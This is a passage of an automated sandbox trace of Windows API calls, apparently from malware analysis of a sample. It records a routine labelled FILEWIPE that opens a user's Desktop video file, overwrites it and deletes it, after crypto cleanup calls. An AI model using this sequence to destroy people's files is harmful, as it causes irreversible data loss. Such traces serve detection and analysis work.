| out: hHeap=0x770000) returned 1 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.704] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.704] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.704] CryptDestroyKey (hKey=0x7c2200) returned 1 [0029.704] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.704] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.704] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.704] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.704] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.704] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.705] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.705] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.705] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.705] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.705] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0029.705] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.705] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.706] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.706] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.706] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.708] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.708] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.710] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.710] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.710] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x5e69cf20, ftLastWriteTime.dwHighDateTime=0x1d5c010, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0x7c2240 [0029.711] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.711] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.711] CharLowerBuffW (in: lpsz="byte[56453]", cchLength=0xb | out: lpsz="byte[56453]") returned 0xb [0029.712] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.712] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.712] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.712] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.712] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.712] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.713] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.713] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.713] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.716] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.716] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aegtpts7bd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0029.717] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.717] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.717] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.717] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.717] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.718] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.718] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.718] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.718] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.718] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.718] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.718] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.719] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.719] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFilePart=0x0) returned 0x34 [0029.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x1198da00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0x7c2240 [0029.719] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aegtpts7bd.avi")) returned 1 [0029.720] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x1198da00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0 